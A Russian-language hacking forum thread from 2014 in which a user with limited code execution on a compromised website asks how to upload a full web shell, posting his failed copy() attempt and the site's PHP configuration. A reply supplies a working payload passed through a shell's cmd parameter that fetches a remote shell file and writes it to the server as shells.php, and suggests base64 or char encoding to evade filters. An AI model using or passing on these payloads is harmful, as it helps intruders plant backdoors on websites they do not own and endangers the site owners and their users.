Помогите залить шелл через мини-шелл.

Discussion in 'Песочница' started by 6nick9, 9 Sep 2014.

  1. 6nick9

    6nick9 New Member

    Joined:
    12 Aug 2011
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Помогите залить шелл через мини-шелл.
    phpinfo(); выводит, но шелл не заливается.
    Пробовал: copy('http://site.ru/s.txt','s.php');

    Конфигурация PHP из phpinfo:
    Code:
    Directive	Local Value	Master Value
allow_call_time_pass_reference	Off	Off
allow_url_fopen	On	On
allow_url_include	Off	Off
always_populate_raw_post_data	Off	Off
arg_separator.input	&	&
arg_separator.output	&	&
asp_tags	Off	Off
auto_append_file	no value	no value
auto_globals_jit	On	On
auto_prepend_file	no value	no value
browscap	no value	no value
default_charset	no value	no value
default_mimetype	text/html	text/html
define_syslog_variables	Off	Off
disable_classes	no value	no value
disable_functions	exec,passthru,shell_exec,system,proc_open,popen	exec,passthru,shell_exec,system,proc_open,popen
display_errors	Off	Off
display_startup_errors	Off	Off
doc_root	no value	no value
docref_ext	no value	no value
docref_root	no value	no value
enable_dl	Off	Off
error_append_string	no value	no value
error_log	no value	no value
error_prepend_string	no value	no value
error_reporting	6143	6143
expose_php	On	On
extension_dir	/usr/lib/php52/20060613	/usr/lib/php52/20060613
file_uploads	On	On
highlight.bg	#FFFFFF	#FFFFFF
highlight.comment	#FF8000	#FF8000
highlight.default	#0000BB	#0000BB
highlight.html	#000000	#000000
highlight.keyword	#007700	#007700
highlight.string	#DD0000	#DD0000
html_errors	Off	Off
ignore_repeated_errors	Off	Off
ignore_repeated_source	Off	Off
ignore_user_abort	Off	Off
implicit_flush	Off	Off
include_path	.:/usr/share/pear	.:/usr/share/pear
log_errors	On	On
log_errors_max_len	1024	1024
magic_quotes_gpc	Off	Off
magic_quotes_runtime	Off	Off
magic_quotes_sybase	Off	Off
mail.force_extra_parameters	no value	no value
max_execution_time	300	300
max_file_uploads	20	20
max_input_nesting_level	64	64
max_input_time	180	180
memory_limit	1024M	1024M
open_basedir	/var/www/site-ru/data:.	no value
output_buffering	4096	4096
output_handler	no value	no value
post_max_size	70M	70M
precision	14	14
realpath_cache_size	16K	16K
realpath_cache_ttl	120	120
register_argc_argv	Off	Off
register_globals	On	On
register_long_arrays	Off	Off
report_memleaks	On	On
report_zend_debug	On	On
safe_mode	Off	Off
safe_mode_exec_dir	no value	no value
safe_mode_gid	Off	Off
safe_mode_include_dir	no value	no value
sendmail_from	no value	no value
sendmail_path	/usr/sbin/sendmail -t -i -f site@site.org	/usr/sbin/sendmail -t -i 
serialize_precision	100	100
short_open_tag	On	On
SMTP	localhost	localhost
smtp_port	25	25
sql.safe_mode	Off	Off
suhosin.log.phpscript.is_safe	Off	Off
track_errors	Off	Off
unserialize_callback_func	no value	no value
upload_max_filesize	70M	70M
upload_tmp_dir	/var/www/site-ru/data/mod-tmp	no value
user_dir	no value	no value
variables_order	GPCS	GPCS
xmlrpc_error_number	0	0
xmlrpc_errors	Off	Off
y2k_compliance	On	On
zend.ze1_compatibility_mode	Off	Off
     
    #1 6nick9, 9 Sep 2014
  2. hpol

    hpol Elder - Старейшина

    Joined:
    11 Dec 2013
    Messages:
    62
    Likes Received:
    16
    Reputations:
    15
    так попробуй

    http://host.ru/shell.php?cmd=$url = "Ссылка_на_шелл.txt";$content = file_get_contents($url);$h = fopen("shells.php","w");$text = "$content";fwrite($h,$text);fclose($h);

    как вариант еще шифрануть это в чар или base64 и вставить так

    тут почитай /thread307894.html
     
    #2 hpol, 9 Sep 2014
(You must log in or sign up to post here.)